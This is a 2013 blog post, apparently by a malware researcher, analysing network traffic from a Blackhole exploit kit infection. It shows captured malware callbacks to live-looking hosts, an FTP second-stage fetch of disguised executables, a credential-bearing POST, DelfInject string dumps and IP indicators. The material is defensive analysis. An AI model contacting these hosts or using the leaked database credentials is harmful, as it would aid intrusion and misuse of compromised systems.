Sunday, April 21, 2013

FTP JPG EXE as a Second Stage

Something somewhat interesting. Blackhole exploit at


 GET /forum/links/public_version.php?yf=30:31:32:2v:1f&qe=2v:1k:1m:32:33:1k:1k:31:
1j:1o&u=1f&hs=w&yy=e&jopa=6797956 HTTP/1.1
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_29
Host: jindalo.ru:8080
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive






SHA256:5f22da4c9ace64d97bc5d3107eaaca8cf1b88da61bd173996f839e88222f4257


File name:blackhole.exe


Detection ratio:1 / 46


Analysis date:2013-04-21 21:37:27 UTC ( 0 minutes ago )






https://www.virustotal.com/en/file/5f22da4c9ace64d97bc5d3107eaaca8cf1b88da61bd173996f839e88222f4257/analysis/1366580247/




Ok, nothing new here. Whatever. Thanks for exploiting my Java. Strings is all garbage, Peid balked.




1,400+ UDP 16471 ala ZeroAccess in like 20 minutes and an interesting one on 55755.






 GET /app/geoip.js HTTP/1.0
Host: j.maxmind.com
Connection: close




Ok, nothing new here. I'm located in Boca Raton playing golf with Tiger Woods, how did you guess?




__________________________________________




POST /10qVeAAAA/ebH7oAAAAA/rDhlJAA/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 88.191.130.98:8080
Content-Length: 339
Connection: Keep-Alive
Cache-Control: no-cache





IP Seen on URL Query: http://urlquery.net/report.php?id=1768644




__________________________________________




POST /asp/intro.php HTTP/1.0
Host: 111.68.142.223
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 269
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)




User agent is a big indicator here. Somewhat interesting, documented by #MalwareMustDie http://malwaremustdie.blogspot.com/2012/12/the-crime-still-goes-on-trojan-parfeit.html




Consistent with Trojan Fareit callbacks <Hat Tip MalwareMustDie>, but no botid url following this.


__________________________________________




This one looks interesting. Using Bit.ly, but a 301 to google put the kabash on this one. 




POST /YddCcn? HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 121
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: bit.ly
Connection: Keep-Alive

op=IncluirAvisos&HostBD=dbmy0060%2Ewhservidor%2Ecom&SenhaBD=delphi2020&UsuarioBD=
turckatty_2&DatabaseBD=turckatty_2&sgdb=




Well the user agent is known badness: here and here dating back to 2010.






 GET /WggQJ3RVGrKgdj0xLjImaWQ9NDIzODYxMDcxNiZhaWQ9MzA1NjImc2lkPTAmb3M9NS4xLTMyGuzZ
0s7u HTTP/1.0
Host: xlotxdxtorwfmvuzfuvtspel.com
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Accept-Language: en-us
Connection: close




I surmise this is a check in because I get a 200 OK but the content is empty - just a speculation.  Site Sinkholed.






Ok, now for some FTP. The malware calls out to FTP server with user name and password in clear text (most appreciated).















220 Microsoft FTP Service

USER <redacted>

331 Password required for <redacted>.
 
PASS <redacted>

230 User logged in.

215 Windows_NT

CWD /dados/maxo4/

250 CWD command successful.
 
PASV
227 Entering Passive Mode (<redacted>).
RETR E174D3044694.jpg

550 The system cannot find the file specified. 








This thing tried multiple jpg files, none of which could be found.










Well, I'm not going to let that one go by.










Peaked my interest. I go digging and I find a root directory




























Interesting, so I download the jpgs that are there. 














The worm is a variant on DelfInject.




MZP   ÿÿ¸@  º   ´ Í!¸ LÍ!This program must be run under Win32 $






Dumping the strings:




DVCLAL
PACKAGEINFO
PORCOS
TDTCONFIG
TFORM1
TFRMDATETIME
xn7
CPlApplet
kernel32.dll
LoadLibraryA
GetProcAddress
VirtualAlloc
VirtualFree
oleaut32.dll
SysFreeString
advapi32.dll
RegQueryValueExW
user32.dll
LoadStringW
msimg32.dll
AlphaBlend
gdi32.dll
UnrealizeObject
version.dll
VerQueryValueW
ole32.dll
OleUninitialize
comctl32.dll
InitializeFlatSB
winspool.drv
OpenPrinterW
ntdll
NtUnmapViewOfSection




Interesting DNS Traffic to a Sprint Wireless Address, no further traffic on this one. Pwned mobile? (Guessing)




00000085 : 00 00 00 01 00 00 03 31 37 33 01 34 03 32 35 30 [.......173.4.250]
00000095 : 02 31 30 07 69 6E 2D 61 64 64 72 04 61 72 70 61 [.10.in-addr.arpa]





173.4.250.10


88.191.130.98:8080


jindalo.ru:8080


111.68.142.223










Additional References:


http://labs.snort.org/iplists/urllist-2012-07-01


http://www.soleranetworks.com/blogs/tag/mozilla4-0-compatible-win32-winhttp-winhttprequest-5/


http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=VirTool%3AWin32%2FDelfInject.gen!BI











Posted by





at
3:13 PM



































No comments:















Post a Comment


















        

      









Subscribe to:
Post Comments (Atom)